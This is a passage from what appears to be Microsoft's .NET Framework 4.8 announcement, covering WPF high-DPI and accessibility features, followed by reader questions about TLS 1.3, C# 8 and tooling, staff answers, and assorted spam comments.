(Windows 10 v1803). When hosted HWND’s or Windows Forms controls are created as Mixed-Mode DPI scaled windows, (as described in the “Mixed-Mode DPI Scaling and DPI-aware APIs” documentation by calling SetThreadDpiHostingBehavior and SetThreadDpiAwarenessContext API’s), it will be possible to host such content in a Per-Monitor V2 WPF application and have them be sized and scaled appropriately. Such hosted content will not be rendered at the native DPI – instead, the OS will scale the hosted content to the appropriate size. The support for Per-Monitor v2 DPI awareness mode also allows WPF controls to be hosted (i.e., parented) under a native window in a high-DPI application. Per-Monitor V2 DPI Awareness support will be available on Windows 10 v1607 (Anniversary Update). Windows adds support for child-HWND’s to receive DPI change notifications when Per-Monitor V2 DPI Awareness mode is enabled via the application manifest. This support is leveraged by WPF to ensure that controls that are hosted under a native window can respond to DPI changes and update themselves. For e.g.- a WPF control hosted in a Windows Forms or a Win32 application that is manifested as Per Monitor V2 – will now be able to respond correctly to DPI changes and update itself. Note that Windows supports Mixed-Mode DPI scaling on Windows 10 v1803, whereas Per-Monitor V2 is supported on v1607 onwards. To try out these features, the following application manifest and AppContext flags must be enabled: - Enable Per-Monitor DPI in your application - Turn on Per-Monitor V2 in your app.manifest - Turn on High DPI support in WPF - Target .NET Framework 4.6.2 or greater and 3. Set AppContext switch in your app.config Alternatively, Set AppContextSwitch Switch.System.Windows.DoNotUsePresentationDpiCapabilityTier2OrGreater=false in App.Config to enable Per-Monitor V2 and Mixed-Mode DPI support introduced in .NET 4.8. The runtime section in the final App.Config might look like this: AppContext switches can also be set in registry. You can refer to the AppContext Class for additional documentation. WPF – Support for UIAutomation ControllerFor property UIAutomation’s ControllerFor property returns an array of automation elements that are manipulated by the automation element that supports this property. This property is commonly used for Auto-suggest accessibility. ControllerFor is used when an automation element affects one or more segments of the application UI or the desktop. Otherwise, it is hard to associate the impact of the control operation with UI elements. This feature adds the ability for controls to provide a value for ControllerFor property. A new virtual method has been added to AutomationPeer: To provide a value for the ControllerFor property, simply override this method and return a list of AutomationPeers for the controls being manipulated by this AutomationPeer: WPF – Tooltips on keyboard access Currently tooltips only display when a user hovers the mouse cursor over a control. In .NET Framework 4.8, WPF is adding a feature that enables tooltips to show on keyboard focus, as well as via a keyboard shortcut. To enable this feature, an application needs to target .NET Framework 4.8 or opt-in via AppContext switch “Switch.UseLegacyAccessibilityFeatures.3” and “Switch.UseLegacyToolTipDisplay”. Sample App.config file: Once enabled, all controls containing a tooltip will start to display it once the control receives keyboard focus. The tooltip can be dismissed over time or when keyboard focus changes. Users can also dismiss the tooltip manually via a new keyboard shortcut Ctrl + Shift + F10. Once the tooltip has been dismissed it can be displayed again via the same keyboard shortcut. Note: RibbonToolTips on Ribbon controls won’t show on keyboard focus – they will only show via the keyboard shortcut. WPF – Added Support for SizeOfSet and PositionInSet UIAutomation properties Windows 10 introduced new UIAutomation properties SizeOfSet and PositionInSet which are used by applications to describe the count of items in a set. UIAutomation client applications such as screen readers can then query an application for these properties and announce an accurate representation of the application’s UI. This feature adds support for WPF applications to expose these two properties to UIAutomation. This can be accomplished in two ways: - DependencyProperties New DependencyProperties SizeOfSet and PositionInSet have been added to the System.Windows.Automation.AutomationProperties namespace. A developer can set their values via XAML: 2. AutomationPeer virtual methods Virtual methods GetSizeOfSetCore and GetPositionInSetCore have also been added to the AutomationPeer class. A developer can provide values for SizeOfSet and PositionInSet by overriding these methods: Automatic values Items in ItemsControls will provide a value for these properties automatically without additional action from the developer. If an ItemsControl is grouped, the collection of groups will be represented as a set and each group counted as a separate set, with each item inside that group providing its position inside that group as well as the size of the group. Automatic values are not affected by virtualization. Even if an item is not realized, it is still counted towards the total size of the set and affects the position in the set of it’s sibling items. Automatic values are only provided if the developer is targeting .NET Framework 4.8 or has set the AppContext switch “Switch.UseLegacyAccessibilityFeatures.3” – for example via App.config file: Closing Please try out these improvements in the .NET Framework 4.8 and share your feedback in the comments below or via GitHub. Thank you! In your API changes document, you have added a new Tls13 enum value. Anymore information about that and what Windows versions will support TLS 1.3? TLS 1.3 support was added to .NET Framework 4.8 in a way that it will light up when it is available in the OS. Please check Windows announcements and plans when that is going to happen. We do not have deeper insights into TLS 1.3 schedule in Windows OS. Hello Ziki, back with TLS 1.2, it was announced that using .NET 4.6 as the target framework, we get automatic support for the correct cypher suite etc as supported/configured by the OS. * Will this extend to TLS 1.3 without updating the .NET framework? * Will I have to install .NET 4.8 on the client to get automatic support while still running with a target framework of .NET 4.6? * Will I be required to set the target framework 4.8 (or some compatibility switch) to get TLS 1.3 <startup><supportedRuntime version=”v4.0″ sku=”.NETFramework,Version=v4.6.2″/></startup> Many thanks and best regards, Michael thanks Michael car rental iran Hello Michael, sorry for late answer, I missed your reply 🙁 Yes, the same TLS1.2 promise should be extended to TLS1.3 as soon as the OS supports it and if your application leaves the recommended OS defaults as per our guidance. I am not 100% sure if .NET Framework 4.8 will have to be installed (I think that it is not must have, but only about 70% sure). Your app will NOT have to target 4.8 for sure. I would suggest to test it out once TLS1.3 is supported by the OS. Appears link for Developer Guide for Per monitor application development in WPF is broken. Under WPF high DPI section. Thank you for reporting it! The link is fixed now. Note that Windows supports Mixed-Mode DPI scaling on Windows 10 v1803, whereas Per-Monitor V2 is supported on v1607 onwards. Per Monitor v2 was added in 1703 (Creators Update), which is correctly written in the manifest comments and on High DPI link that is included. very good خرید بازی ps4 ارزان great شرایط و خدمات اجاره خودرو many thanks a good deal this amazing site can be conventional in addition to relaxed.لوله بازکنی `The JIT in .NET 4.8 is based on .NET Core 2.1` – does it mean that Tiered Compilation also comes to .Net 4.8 from Core 2.1? Tiered compilation is not supported with .NET Framework 4.8, and there are no plans to enable it. You can also see that we’re still working (after multiple versions) on designing it’s final configuration. It isn’t a good candidate for .NET Framework. With the new enhancements, will I be continuing to use 64bit native DLLs in Any CPU Add-ins for 32bit Excel? very good اجاره خودرو How am I supposed to use it in Visual Studio if there is no project templates for . Net Core ? The “.NET Framework 4.8 Developer Package” breaks all of my VB WPF projects. The “Application” tab of project properties displays an error: “An error occurred trying to load the page.The method or operation is not implemented.”. I have to roll back to .NET Framework 4.7.2 to continue my work 🙁 Have you tested it with VB projects before releasing? Same problem here 🙁 … VB too … soooo many bugs in VS, please do not introduce new bugs 🙁 thanks Morten Jonsen اجاره خودرو مجوزدار Thank you for reporting this issue. We are working on the fix in VS. Meanwhile – we have documented a workaround for it on the developer community. This comment has been deleted. Thank you for reporting it! The link is fixed now. car rental tehran Does .NET 4.8 support C# 8? A little bit confused how .NET framework version correlates with C# language version. No C# 8 is only supported by .NET Core. That is discussed here. C# 8 relies on features that must be implemented by the runtime (e.g. ranges) and that functionality isn’t being added to .NET Framework 4.8. Hello Guys, Last year you stated in a blog post that the .Net Framework 4.8 will include Modern browser. But I’m unable to find anything like that in the release notes. Any updates on this? (or have I been looking in the wrong place) They probably changed that, now that Edge is switching to Microsoft Chrome. Build Tools + VS 2019 Installer not supporting .Net 4.8? When will the Visual Studio Installer have .Net 4.8 as an available payload/component? This is highly confusing – I’d like to be able to use 4.8 on headless build agents. I am wondering the same! If you install the 2019 Build Tools and then install the .NET 4.8 Developer Pack you should be good to go as I’ve verified it working in my environment. You can download it here. Hi! Am a newbie programmer and i want to use .NET to develop a webapp for my website… Is that even possible? It was really a good article. Microsoft is always doing its best to provide updates. اجاره خودرو Nice post.. Win Movie maker Will 4.8 be available to deploy via WSUS as previous frameworks have been made available? No rush. I just want to confirm that is coming to WSUS. In other words, i want to be able to approve the install of 4.8 on a Windows Server 2019/2016/2012R2 server, as well as Windows 10/7 desktops through WSUS (i used to be able to do this). I have been using Tls1.2 now for several months. Now I want to switch to Tls1.3. My Server and Client side code snippets look like this. This works. ((SslStream)comStream).AuthenticateAsServer(serverCertificate, true, SslProtocols.Tls1.2, checkCertificateRevocation: true); ((SslStream)comStream).AuthenticateAsClient(serverName, certs, SslProtocols.Tls1.2, true); My assumption is that to now use Tls1.3, all I need to do is change the SslProtocols value as shown below. However, the AuthenticateAsClient now throws an exception of “The client and server cannot communicate, because they do not possess a common algorithm”. This is happenening even when the client and server are running on the same machine. Again. Using Tls1.2 works just fine. Any suggestions? There does not seem to be any documentation out there yet. 🙁 Thank You ((SslStream)comStream).AuthenticateAsServer(serverCertificate, true, SslProtocols.Tls1.3, checkCertificateRevocation: true); ((SslStream)comStream).AuthenticateAsClient(serverName, certs, SslProtocols.Tls1.3, true); Hello Ben, I believe that TLS1.3 is not yet supported by the OS, that’s why it does not work for you. First wait for the OS to support TLS1.3 by default (there are some reg-key options AFAIK), then try the code above with Tls1.3. I believe that should just work then. This comment has been deleted. This comment has been deleted. This blog is so much nice and interesting too for the readers. thank u. رزرو هتل های ایران However, the AuthenticateAsClient now throws an exception of<a href=" games cheaperen/”>get navaran Can you please open a GitHub issue and provide details? I love your website. really tnx جزیره هرمز Hi, where can I find the 64-bit version of NGEN.EXE (.Net 4.8) after installing .Net 4.8 runtime or SDK? When I entered this in the Developer Command Prompt: install ClientApp.exe I get this message: Microsoft (R) CLR Native Image Generator – Version 4.8.3752.0 Failed to compile ClientApp.exe because this image is a 64bit assembly; try using 64bit ngen instead. Regards Robert Hello, Do you know why the UseLegacyFipsThrow switch for VSTO add-ins is set to true (old behavior) by default? Was it intentional? All other project types I tested use the new policy as default. Thanks, Alain yes your reply is exactly true and this is a very good website کاغذ دیواری قیمت I,m agree with you, so useful فیزیوتراپی motogp 19 Découvrez les dernières nouvelles de decoration ici very good thank youترجمه تخصصی فارسی به انگلیسی very nice tnx After i update my netframework the speed of my device getting faster and look good than the previous.. a totally agree with you, mine too necklace for women this comment has been deleted. Ah, I think I’ve found it. It doesn’t show up in the “Individual components” tab, just as a “Workload”, which is why I couldn’t find it. خرید صنایع دستی
https://devblogs.microsoft.com/dotnet/announcing-the-net-framework-4-8/?utm_source=t.co&utm_medium=referral
CC-MAIN-2020-10
refinedweb
4,336
58.28
As you have already seen in the introduction to this chapter, RSS 1.0 differs from RSS 2.0 and Atom insofar as its vocabulary remains restricted to the core of the language. However, it doesn’t fall short in its expression, because it is extensible through modules in many ways. The developers of the standard accepted three core modules with the RSS 1.0 vocabulary. These are components of the language although they belong to different namespaces. A considerable number of additional modules have been suggested until today. The modularization made RSS 1.0 a frontrunner among the XML vocabularies. It wasn’t until years later that other XML dialects, like Scalable Vector Graphics (SVG;) and Synchronized ... No credit card required
https://www.oreilly.com/library/view/rss-and-atom/9781904811572/ch03s05.html
CC-MAIN-2018-43
refinedweb
122
52.36
Paint Your Github Profile with Serverless I'm often asked things like "What should I make?" or "Where do the ideas come from?". I've covered how I generate ideas before. The gist being, write down all your ideas, great or small. This works great for demos. But what about when you want to learn something a little more applied? Like putting together a project or trying out more tools. One thing I advocate is building tools. Tools that you want to use. Tools that solve a problem for you. That's right, make for yourself. This has many benefits: - You're invested in the idea. - You get to learn many things to solve your problem. - You have something to show potential employers/clients that's different. That last point could be particularly useful. Interesting side projects make for good talking points. I can't tell you how many times I've had comments because of my Github profile. Because the hiring staff check it out and see an image painted in the contributions graph. Today, we're going to walk through a project I made last year. "Vincent van Git" gives you a way to paint your Github contributions graph. I want to cover the "What?", the "Why?", and the "How?". What? permalink As mentioned above, "Vincent van Git" helps you paint your Github contributions graph. It's a web app that generates a shell script for you to run on your machine. The result is that you populate your graph with commits that paint a picture. Over time (around 3 months), that picture will move and you'll need to recreate it. Why? permalink This part's split into two, "Why make it?" and "Why make it?" ha. First. Before making "Vincent", I'd always used the package "gitfiti". It's a command-line tool for applying graffiti to your contributions graph. It uses Python and you draw images with Arrays. python KITTY = [ [0,0,0,4,0,0,0,0,4,0,0,0], [0,0,4,2,4,4,4,4,2,4,0,0], [0,0,4,2,2,2,2,2,2,4,0,0], [2,2,4,2,4,2,2,4,2,4,2,2], [0,0,4,2,2,3,3,2,2,4,0,0], [2,2,4,2,2,2,2,2,2,4,2,2], [0,0,0,3,4,4,4,4,3,0,0,0], ] If you squint hard enough, you'll see the kitty. But, the fact it's a non-visual tool for a visual result made it tricky for me to use. It's a great tool, don't get me wrong. But, I always wanted a visual way to make my creations. Now, I could've created a front end to generate that Array. And then used it with gitfiti. But, why stop there? Why not have a go at creating my own version from scratch? This leads us to the second "Why?". Because there's an opportunity to learn a variety of different tools here. There's also the opportunity to try new things out. And this goes back to the point we made in the introduction. With side projects that aren't the norm, you get to solve problems that aren't the norm. And that will help you develop your skills as a problem solver. Before diving into the things learned and how. Here are some of the things I got to try out more. They aren't likely to pop up in a tutorial CRUD app. That's not to say we shouldn't follow those tutorials when we're starting out. But, when we start looking for "What's next?", there are advantages to being adventurous. How? permalink It's time for "How?". I'm going to break this part down into different sections. I won't dig in too deep but I will go over how certain things are possible. The talking points so to speak. Electron permalink I had it in my head I wanted to create an electron app for "Vincent". A desktop app I could fire up, draw something, and hit "Submit". It didn't pan out that way but that's how it started. And this was a key part of the project. I had chosen to use electron because I wanted to make a React app that could use Node on the user's machine. That would provide a way to invoke "git" from within electron. I hadn't played with this idea much before but it was a chance to get familiar with the ipcRenderer. That's a way you can communicate between the renderer and the main process. That means you can hit a button in React world and fire a function in Node world. I put together this repo that shows how this is possible. On OSX, if you press a message button in the front end, it uses say on the command line to read out the message. Front End permalink I had a good idea of what I wanted here. We needed a grid that resembled the Github contributions graph. A user can use their pointer to paint the grid. Each cell can either be transparent or one of four shades of green. Here's what the final grid looks like. The tricky part with these types of interaction and React is that we don't want to update the state on every paint. That would cause lots of rerendering. Instead, we can use refs to keep track of what's going on. Making something different challenges us to use the tools we use in a different way. Something like Vincent is great for working with DOM manipulation and React. I've done this for other projects too like "PxL". This part of the project was all about generating the Array we mentioned earlier. We're giving the user a way to generate the Array of digits from 0 to 4 without having to type it out. Web Scraping with Serverless permalink Now, what makes "Vincent" possible is empty commits. The way it works is that we generate hundreds of empty commits and commit them to a repository of your choice. And those empty commits show up in the contribution graph. How do you get the four different greens? Well, this depends on the amounts of commits. For example, if we say your max commits per year is 100. Then to get the 4 levels, we can use 400, 300, 200, and 100 commits per day. That will generate the four shades of green. The main thing we need is the max number of commits for the username. To grab that we make some checks and then scrape the activity page on Github. In "Vincent", we ask for a user name, branch name, and repository name. "Vincent" checks that they exist and that they're empty before scraping for commits. We're making about 4 or 5 requests here. This is where serverless comes in handy. We can put them requests into a Netlify function and then the front end only needs to make one request. This is the important part of that function. Here we make a request for the "contributions" page. And then we use cheerio to scrape for the highest amount of commits over the last year. javascript const getCommitMultiplier = async (username) => { // Grab the page HTML const PAGE = await ( await fetch(`{username}/contributions`) ).text() // Use Cheerio to parse the highest commit count for a day const $ = cheerio.load(PAGE) // Instantiate an Array const COUNTS = [] // Grab all the commit days from the HTML const COMMIT_DAYS = $('[data-count]') // Loop over the commit days and grab the "data-count" attribute // Push it into the Array COMMIT_DAYS.each((DAY) => { COUNTS.push(parseInt(COMMIT_DAYS[DAY].attribs['data-count'], 10)) }) // console.info(`Largest amount of commits for a day is ${Math.max(...COUNTS)}`) return Math.max(...COUNTS) } You could create a local version of this too and parse the response. Try making that request with your own username. Generating a Shell Script permalink Next up we need a shell script to push all these generated empty commits. This part is about creating a big string in a loop. For every commit, we are assigning a date and many commits based on the draw level. The first part requires the use of luxon (We don't need moment.js anymore) to match dates to commits. There is a little Math around the dates that was a little tricky on the first couple of tries. But once it's sussed, your good! javascript const processCommits = async (commits, multiplier, onCommit, dispatch) => { const TODAY = DateTime.local() const START_DAY = TODAY.minus({ days: commits.length - 1 }) let total = 0 let genArr = [] for (let c = 0; c < commits.length; c++) { const LEVEL = commits[c] const NUMBER_COMMITS = LEVEL * multiplier total += NUMBER_COMMITS genArr.push(NUMBER_COMMITS) } // Dispatch a message. dispatch({ type: ACTIONS.TOASTING, toast: { type: TOASTS.INFO, message: MESSAGES.TOTAL(total), life: 4000, }, }) // Loop through the commits matching up the dates and creating empty commits for (let d = 0; d < genArr.length; d++) { // Git commit structure // git commit --allow-empty --date "Mon Oct 12 23:17:02 2020 +0100" -m "Vincent paints again" const COMMITS = genArr[d] if (COMMITS > 0) { const COMMIT_DAY = START_DAY.plus({ days: d }) for (let c = 0; c < COMMITS; c++) { onCommit(COMMIT_DAY.toISO({ includeOffset: true })) } } } } Once we have all the commit data ready it's time to generate that script. It's a long string based on the commit dates, the username, branch, etc. javascript const generateShellScript = async ( commits, username, multiplier, repository, branch, repoPath, dispatch ) => { let SCRIPT = `mkdir ${repoPath} cd ${repoPath} git init ` await processCommits( commits, multiplier, (date) => { SCRIPT += `git commit --allow-empty --date "${date})}" -m "Vincent paints again"\n` }, dispatch ) SCRIPT += `git remote add origin{username}/${repository}.git\n` SCRIPT += `git push -u origin ${branch}\n` SCRIPT += `cd ../\n` SCRIPT += `rm -rf ${repoPath}\n` return SCRIPT } Ditching Electron permalink "Wait. I thought you wanted to use electron?" – Reader I did. I got quite far with it. But, I hit some blockers, and that's OK. The issues were around pushing the commits via Node. It would take a long time and sometimes run out of buffer. The other issue was that I couldn't communicate this to the front end in a clean way. This is why I started generating the shell scripts. And I'd started digging in with electron-dl and electron-store when it hit me. "This belongs on the web". I'd only read up on how to package a desktop app for different platforms and it looked OK. But, from testing and feedback, there were some issues already with Windows. There was also the factor of usability. This isn't a tool you use every day. And the web is more accessible than downloading and installing an app, etc. I decided to ditch electron at this point. And this is where React is great. Because I'd created various building blocks for the front end, it was painless to port those into a web app. Was it a waste of time? No! Because I didn't use electron for the final product, doesn't mean it was a waste of time to try. In fact, I learned a lot about electron in a short space of time which was neat. UI Fun permalink At this stage, I had a working proof of concept 🙌 Now I could have some fun with it and put together all the conveniences for users. A form to configure, the ability to save and load drawings, animations, etc. These are the things that stood out for me. Configuration permalink I needed forms for configuration. Somewhere for a user to put their username, branch, and repository information. But, I also wanted to create a sliding drawer effect. For form handling, I could've reached for formik or created the form handling myself. But instead, I thought I'd give react-hook-form a try and it was great. It was another opportunity to try something different. Here's how the sliding drawer looks. The other benefit to building things like this is that you can look for patterns to refactor. This drawer became a reusable component. I reuse it for an "info" drawer on the right side in the app. Audio permalink I like to add a little whimsy to my projects. It's something people associate with me. Sound was a must and I hooked up some button clicks and actions to audio with a quick custom hook. javascript import { useRef } from 'react' const useSound = (path) => { const soundRef = useRef(new Audio(path)) const play = () => { soundRef.current.currentTime = 0 soundRef.current.play() } const pause = () => soundRef.current.pause() const stop = () => { soundRef.current.pause() soundRef.current.currentTime = 0 } return { play, stop, pause, } } export default useSound But, the real joy would be audio when painting the grid. I wanted to try out Tone.js some more after seeing it on "Learn with Jason". And this seemed like a great opportunity. Different levels play different notes. Erasing plays a dull note. Toasts permalink The app needed some little toast components to let the user know what's happening. For example, confirming a save or telling the user that the commits are being generated. I could've reached for off-the-shelf ones. But, I couldn't remember making any myself in open source. This felt like a good opportunity to do that. With a little React and GreenSock, I had a nice Toasts component. The neat thing about creating a Toast component is that it makes you think more about components. You need to use the state to trigger creation. But, you don't tie state to the Toasts. It's worth checking the code on that one. Animation permalink I love to put some animation somewhere. And with this being my own project I can put as much as I like in. What better than a loading animation when the shell script gets generated? Playing on the project name and writing code, I settled on this. Some audio and 8-bit style music tops it off! Zip Files permalink If you try and download a shell script for users, you're prompted with a security warning. It's not something I've needed to do before and this was new to me. The audience on live stream suggested trying out jszip. And this solved a problem in a neat way. Using jszip I could bundle a README and the shell script for the user and have them download a single zip file. This way the user has instructions to run the file too. javascript const FILE = new zip() FILE.file('vincent-van-git.sh', SCRIPT) FILE.file('README.md', README) const ZIP_FILE = await FILE.generateAsync({ type: 'blob' }) downloadFile(ZIP_FILE, 'vincent-van-git.zip') This was convenient and another opportunity to try something new that I wouldn't have. That's It! permalink I deployed it, made a quick video, and shared it! All the code is open source. And you can use the app to paint commits to your Github profile with serverless. I learned a bunch from creating "Vincent van Git". And it solves a problem for me. There were techniques for me to try and opportunities to try out different packages. What's the actionable advice here? Make for yourself. That's the actionable advice here. Make something that you will find useful. Make a tool or something you're interested in. It could solve a particular problem for yourself. It will likely solve a problem for others too. And it gives you an outlet to learn and try new things. Make for yourself.
https://jhey.dev/writing/paint-your-github-profile-with-serverless/
CC-MAIN-2021-31
refinedweb
2,626
77.23
Unlike Static Methods, Class Methods are bound to a Class. So, we don’t have to create an instance or object of a class to call this classmethod. A Python classmethod receives cls (class) as an implicit first argument, just like a normal method receives self as the first argument. This cls allows you access the class variables, methods and the static methods of the class. You can define any method as the Python classmethod by using the @classmethod decorator or classmethod() function. Either ways will work but it is always advisable to go for the first option. Before we get into the example, let me show you the syntax of the Python classmethod is as shown below Class A: @classmethod def function_name(cls, arg1, arg2,....): ........ ...... Or Class A: def function_name(cls, arg1, arg2,....): ........ ...... A.function_name = classmethod(function_name) You can call the class method using ClassName.MethodName() or ClassName().MethodName(). Both ways will return the classmethod result. In this article, we will show you, how to create or define a classmethod in Python programming language using @classmethod and classmethod() with examples. Python classmethod using Decorator In this example, we are creating a class method called message using the @classmethod decorator. Within this method, cls.__name__ returns the class name (Employee) and cls.company returns the class variable company value (Tutorial Gateway). # Python Class Method class Employee: company = 'Tutorial Gateway' @classmethod def message(cls): print('The Message is From %s Class' %cls.__name__) print('The Company Name is %s' %cls.company) Employee.message() print('-----------') Employee().message() # Other way of calling classmethod OUTPUT Python classmethod using classmethod() function Here, we are using the classmethod() function to create a class method. From the below code, Employee.printValue = classmethod(Employee.printValue) statement will convert the method to class method. class Employee: value = 100 def printValue(cls): print('The Value = %d' %cls.value) Employee.printValue = classmethod(Employee.printValue) Employee.printValue() OUTPUT Call Static Method from classmethod in Python In this example, we will show you, how to call the Static Methods within the class method. Here, we created a static method called func_msg() which prints welcome message. Next, we defined the message class method that returns the class variable company and the class name. Within the same function, we are calling the static method using the cls.methodname. class Employee: company = 'Tutorial Gateway' @classmethod def message(cls): print('The Company Name is %s' %cls.company) print('The Message is From %s Class' %cls.__name__) cls.func_msg() @staticmethod def func_msg(): print("Welcome to Python Programming") Employee.message() OUTPUT Here, Instead of printing the message, we are finding the sum and average. First, we created a Static Method that accepts three arguments and returns some of those three. Next, we defined a Python classmethod that calls the static method using the cls. Within the class method, it finds returns the average of static method result. class Employee: company = 'Tutorial Gateway' @staticmethod def add(a, b, c): return a + b + c @classmethod def avg(cls): x = cls.add(10, 20, 40) return (x / 3) average = Employee.avg() print('The Average Of three Numbers = ', average) OUTPUT Alter class variable using clasmethod in Python In this example, we are going to create a class method that accepts an argument and assigns the value to the class variable. It means, when you call this method, it will replace the company text with the new text that you provide as an argument value. This helps to hide the class variables, and allows the end users to work with the class variable. class Employee: company = 'Tutorial Gateway' @classmethod def func_newName(cls, new_Name): cls.company = new_Name emp = Employee() print(Employee.company) print(emp.company) print('----------') Employee.func_newName('Python') print(Employee.company) print(emp.company) OUTPUT Real-time Examples of classmethod in Python For example, if our client is receiving the Employee information in a long string, and the details are separated by the – (or any other delimiter). Instead of performing splitting operations from his end, we can create a classmethod and allow them to use it. In this Python classmethod example, we initialised fullname, age, gender and salary. Next, we created a classmethod that will split the given string based on – and returns those values. TIP: I suggest you to refer to the Python split string article to understand the split function. class Employee: def __init__(self, fullname, age, gender, salary): self.fullname = fullname self.age = age self.gender = gender self.salary = salary @classmethod def func_string_split(cls, employee_str): fullname, age, gender, salary = employee_str.split('-') return cls(fullname, age, gender, salary) emp_from_csv1 = 'Suresh-27-Male-120000' emp_from_csv2 = 'John-29-Male-100000' emp_from_csv3 = 'Tracy-25-Female-155000' emp1 = Employee.func_string_split(emp_from_csv1) print(emp1.fullname) print(emp1.gender) print(emp1.salary) print(emp1.age) print('----------') emp3 = Employee.func_string_split(emp_from_csv3) print(emp3.fullname) print(emp3.gender) print(emp3.age) OUTPUT This is an another example of the Python classmethod. Here, we are splitting the date string to Day, Month and Year. Here, we used the Python map function for this splitting. class Date: def __init__(self, day = 0, month = 0, year = 0): self.day = day self.month = month self.year = year @classmethod def string_to_Date(cls, string_Date): day, month, year = map(int, string_Date.split('-')) return cls(day, month, year) dt = Date.string_to_Date('31-12-2018') print(dt.day) print(dt.month) print(dt.year) OUTPUT Thank You for Visiting Our Blog
https://www.tutorialgateway.org/python-classmethod/
CC-MAIN-2019-35
refinedweb
892
50.33
Most C/C++ programmers have likely made use of the __FILE__ and __LINE__ macros in their source files. They are provided by C/C++ compilers for outputting the file and line number of a particular line of code, usually for debugging purposes. I use this a lot with exceptions targeted at trapping bugs. For instance: class BugException { public: BugException(const string& mm, const string& ff, int ll): msg(mm), file(ff), line(ll) {} const string msg; const string file; const int line; }; which I can use as: void doSomething() { // ... fail some bug-trapping test throw BugException("i should be > j", __FILE__, __LINE__); } int main() { try { doSomething(); } catch (BugException& be) { cerr << "*** Bug: " << be.msg << " at file " << be.file << ", line " << be.line << endl; } } One type of debugging info that I often wish the compiler provided is the name of the function or method to which a line of code belongs, something that might be called __FUNCTION__: class Foo { public: Void bar() { cout << "Inside method " << __FUNCTION__ << endl; } }; with the following output: "Inside method void Foo::bar()". This would be handy when one needs to verify, say, the calling order of some functions or methods, or to check that some methods are or are not called. It is not always practical to use debuggers since this most often requires tedious settings of breakpoints, button presses, etc. instead of just running the program in debug mode, and examining the output. The only compiler that seems to offer this kind of macro is gcc. For those unfortunates among us who do not get to use open source compilers such as gcc, there is no way of getting the compiler to generate the output of __FUNCTION__ automatically. Instead, I have had to resort to tricks like #include "Foo.h" void Foo::bar(int a) const { cout << "In method Foo::bar(int) const" << endl; // do stuff ... } Replacing the Foo:: part of the debug output with a call to typeid(*this).name() does not improve the matter much: it is starting to look messy, requires even more typing, and it is not the class name that changes most often, but the method signature itself, including the method's name. I discovered the hard way that good will and vigilance were not enough: the debug info rapidly gets out of sync with the actual class interface, especially when the software is reviewed, extended or debugged. No big deal but has lead to some confusion. After posting a question about this to the ACCU-general mailing list and getting several interesting answers, it was clear that there was no real support for this kind of debugging information, and I would have to design my own. But it was also clear, using bits and pieces mentioned in several posts, mixed in with a little OOD, that a pretty decent, if not perfect, solution was within reach. The essence is to use typeid() on the function or method pointer, something first suggested by Jon Jagger. The pitfall is that you need to make a few substitutions in its output before you can really get something useful. The above example becomes (I define TypeID later) // #include "Foo.h" void Foo::bar(int a) const { cout << "In method " << TypeID::fn(bar, "bar") << endl; // ... } The onus is still on me to keep the second argument in sync with the function/method name (the compiler will notify me if the first one does not correspond to a function/method), but this is clearly far less work that having to worry about the whole function/method declaration. It is also fairly concise and clear. There are many possible ways of implementing TypeID so I will only discuss one possibility. I implemented TypeID as a namespace that groups and provides type information functionality. I first implemented it as a class with static methods, with some of the methods as inline and private to hide some implementation details. However given the context of use (debugging), inlining is not really important, and I was hoping to avoid having to create temporary objects, so I ended up implementing it as a namespace. In this case, static methods are no longer necessary, (they become merely functions), neither are visibility qualifiers, and this probably reflects better the fact that no member data is involved. The header file for TypeID is simply: // file TypeID.hh namespace TypeID { template <typename T> std::string fn(const T& ptr, const std::string& name); } whereas the source file hides the implementation details: // file TypeID.cc #include <typeinfo> namespace TypeID { template <typename T> std::string fn(const T& fptr, const std::string& name) { std::string fsignature = typeid(fptr).name(); simplify(fsignature); return insertName(fsignature, name); } void simplify(std::string& fs) { // do simplifications like fs.replace("basic_string<...>", "string"); } std::string insertName( std::string& fsig, const std::string& fname); } std::string& TypeID::insertName(std::string& routine, const std::string& name){ int i = routine.find_first_of('('); if (i >= routine.size()) // probably // not a function return routine; routine.replace(i, 1, " "); i = routine.find_first_of('*', i); routine.replace(i, 1, name); i = routine.find_first_of(')'); return routine.erase(i, 1); } The fn routine consists, quite simply, of three steps: get the signature of the function pointer passed as first argument; simplify it; and finally, insert the function name given as second argument. The latter is done by insertName, which has to find where to put the name in the signature. The rule I have used is to find the first '*' after the first left parenthesis. I really do not know how universal this is. Therefore, insertName may have to be modified slightly for different compilers (so maybe TypeID should be a class after all and the method made virtual). The simplification step is fairly important due to the very long names that can be produced when STL types appear as arguments to the function/method given as first parameter to TypeID::fn. Clearly, simplify will vary depending on your application, on personal preferences, and so forth. In the above code sample, I used a line of pseudocode to represent one possible type of simplification that could occur. Again, customizing the simplify routine might be a good enough reason to implement TypeID as a class. Finally, it is interesting to note that no check is done on what is passed to TypeID::fn. It could be given a pointer to a method or an object, it would still chug away without complaining, but probably produce meaningless output. Again, given the context of use (debugging), worrying about this level of detail is probably overkill. There are many ways that this could be extended or improved. Having a class with virtual functions for simplify and insertName would allow for easier customisation, though it would require creating an object. In addition, methods/routines could be added that split the function signature into several parts and makes each available separately. With a class instead of namespace, you could do things like: // #include "Foo.h2" void Foo::bar(int a) const { static const TypeID_sgi method(bar, "bar"); cout << "In method " << method.name() << "\nMethod parameters " << method.params() << endl; // ... } where TypeID_sgi is, hypothetically, a subclass of TypeID customised for SGI's MipsPro compiler. If others have any suggestions for improvement or ideas for alternatives, I would be happy to hear from you.
https://accu.org/index.php/journals/462
CC-MAIN-2019-22
refinedweb
1,207
53.21
For comunicate with the device we need the internal IP + MAC The prodotocoll is pretty symple but since today this kind of device is not fully supported but really easy to implement. [python] import broadlink # set this variables strHost = 'xxx.xxx.xxx.xxx' #ip device strMac = 'xx:xx:xx:xx:xx:xx:' #mac device # other stuff: strType = '0x4ead' #HYSEN THERMOSTAT TYPE #convert mac string macbytes = bytearray.fromhex(strMac.replace(':','')) #get the broadlink hysen device device = broadlink.hysen((strHost,80),macbytes,strType) # get auth for futher comunications device.auth() #from now you can talk with the device, for example read the complete status : data = device.get_full_status() # do wathever you want with data :) Sample implementations: - Broadlink comunication protocol: - nest like knob kodepen : Next step: - implement the core features for an hysen device - implement the "setter" code section - clean code - upload to github for public release STAY TUNE ! Hello, it's great to be able to check beok from the web. You could tell me how to do it. Where should I enter the python code?
https://hackaday.io/project/162466-beok-bot-313w-thermostat-hack
CC-MAIN-2020-05
refinedweb
173
55.84
